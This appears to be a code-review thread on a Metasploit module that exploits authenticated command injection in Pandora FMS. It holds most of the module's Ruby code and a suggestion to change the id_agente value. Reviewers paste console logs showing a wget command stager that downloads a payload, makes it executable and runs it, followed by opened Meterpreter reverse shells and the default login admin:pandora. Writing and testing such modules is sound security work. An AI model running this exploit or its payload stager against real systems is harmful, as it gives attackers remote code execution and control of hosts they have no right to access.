modules/exploits/linux/http/pandora_ping_cmd_exec.rb

```diff
@@ -0,0 +1,140 @@
+      'Targets'         =>
+        [
+          ['Automatic Target', {}]
+        ],
+      'DefaultOptions'  =>
+        {
+          'Payload' => 'linux/x86/meterpreter/reverse_tcp'
+        },
+      'DefaultTarget'   => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The URI of the vulnerable Pandora FMS instance', '/pandora_console/']),
+        OptString.new('USERNAME', [true, 'The username to authenticate with']),
+        OptString.new('PASSWORD', [true, 'The password to authenticate with'])
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi({
+      'method'  => 'GET',
+      'uri'     => normalize_uri(target_uri, 'index.php')
+    })
+
+    unless res
+      vprint_error 'Connection failed'
+      return CheckCode::Unknown
+    end
+
+    unless res.body =~ /Pandora/i
+      return CheckCode::Safe
+    end
+
+    pandora_version = res.body.scan('/<div id="ver_num">v(.*?)<\/div>/').flatten.first
+    version = Gem::Version.new(pandora_version)
+
+    print_status("Pandora FMS version #{version}") if version
+
+    if Gem::Version.new(version) <= Gem::Version.new('7.0NG')
+      return Exploit::CheckCode::Appears
+    end
+
+    CheckCode::Detected
+  end
+
+  def authenticate
+    res = send_request_cgi({
+      'method'    => 'POST',
+      'uri'       => normalize_uri(target_uri, 'index.php'),
+      'vars_get'  => {
+        'login'   => '1'
+      },
+      'vars_post' => {
+        'nick'          => datastore['USERNAME'],
+        'pass'          => datastore['PASSWORD'],
+        'login_button'  => 'Login'
+      }
+    })
+
+    return auth_succeeded?(res)
+  end
+
+  def auth_succeeded?(res)
+    unless res && res.code == 200 && res.body.include?('Welcome to Pandora FMS')
+      print_error('Authentication failed!')
+      return false
+    end
+    print_good('Successfully authenticated')
+    print_status('Attempting to retrieve session cookie')
+    @cookie = res.get_cookies
+    unless @cookie.include?('PHPSESSID')
+      print_error('Error retrieving cookie!')
+      return false
+    end
+    print_good("Successfully retrieved session cookie: #{@cookie}")
+    true
+  end
+
+  def filter_bad_chars(cmd)
+    cmd.gsub!(/ /, '${IFS}')
+  end
+
+  def exploit
+    print_status('Exploiting...')
+    execute_cmdstager(flavor: :wget)
+  end
+
+  def execute_command(cmd, opts = {})
+    print_status("Attempting to authenticate using (#{datastore['USERNAME']}:#{datastore['PASSWORD']})")
+    auth = authenticate
+    unless auth
+      fail_with Failure::NoAccess, 'Please provide a valid username and password.'
+    end
+    send_request_cgi({
+      'method'    => 'POST',
+      'uri'       => normalize_uri(target_uri, 'index.php'),
+      'cookie'    => @cookie,
+      'vars_get'  => {
+        'sec'           => 'estado',
+        'sec2'          => 'operation/agentes/ver_agente',
+        'tab'           => 'extension',
+        'id_agente'     => '3',
```

Comment:
```suggestion
        'id_agente'     => '1',
```

Changing this to `1` gets me a session, @space-r7:

```
msf5 exploit(linux/http/pandora_ping_cmd_exec) > rerun
[*] Reloading module...

[*] Started reverse TCP handler on 172.16.249.1:4444
[*] Exploiting...
[*] Using URL: http://0.0.0.0:8080/CoY8xI5iX
[*] Local IP: http://192.168.1.3:8080/CoY8xI5iX
[*] Generated command stager: ["wget -qO /tmp/HNXwqthw http://172.16.249.1:8080/CoY8xI5iX;chmod +x /tmp/HNXwqthw;/tmp/HNXwqthw;rm -f /tmp/HNXwqthw"]
[*] Attempting to authenticate using (admin:pandora)
[+] Successfully authenticated
[*] Attempting to retrieve session cookie
[+] Successfully retrieved session cookie: PHPSESSID=2drf3o9bdqlsqiu8u9p2mp2mu7; clippy=deleted; clippy=deleted;
[*] Client 172.16.249.147 (Wget/1.14 (linux-gnu)) requested /CoY8xI5iX
[*] Sending payload to 172.16.249.147 (Wget/1.14 (linux-gnu))
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (980808 bytes) to 172.16.249.147
[*] Meterpreter session 1 opened (172.16.249.1:4444 -> 172.16.249.147:44484) at 2020-04-02 19:12:10 -0500
[*] Command Stager progress - 130.70% done (149/114 bytes)
[*] Server stopped.

meterpreter > getuid
Server username: no-user @ pandorafms (uid=48, gid=48, euid=48, egid=48)
meterpreter > sysinfo
Computer     : 192.168.1.10
OS           : CentOS 7.3.1611 (Linux 3.10.0-514.el7.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter >
```

Can you confirm the value of `id_agente`, @onurer?

Reply:
Actually, it might be worth making this configurable or iterating through the numbers.

Reply:
Can confirm that changing `id_agente` to 1 got me a session:

```
msf5 exploit(linux/http/pandora_ping_cmd_exec) > rerun
[*] Reloading module...

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Exploiting...
[*] Using URL: http://192.168.37.1:8080/Hyn6AEM
[*] Attempting to authenticate using (admin:pandora)
[+] Successfully authenticated
[*] Attempting to retrieve session cookie
[+] Successfully retrieved session cookie: PHPSESSID=c5glrdgbg97arq177sh5p0p202; clippy=deleted; clippy=deleted;
[*] Client 192.168.37.143 (Wget/1.14 (linux-gnu)) requested /Hyn6AEM
[*] Sending payload to 192.168.37.143 (Wget/1.14 (linux-gnu))
[*] Sending stage (985320 bytes) to 192.168.37.143
[*] Meterpreter session 3 opened (192.168.37.1:4444 -> 192.168.37.143:49942) at 2020-04-06 09:18:28 -0500
[*] Command Stager progress - 100.00% done (147/147 bytes)
[*] Server stopped.

meterpreter > sysinfo
Computer     : 192.168.37.143
OS           : CentOS 7.3.1611 (Linux 3.10.0-514.el7.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
```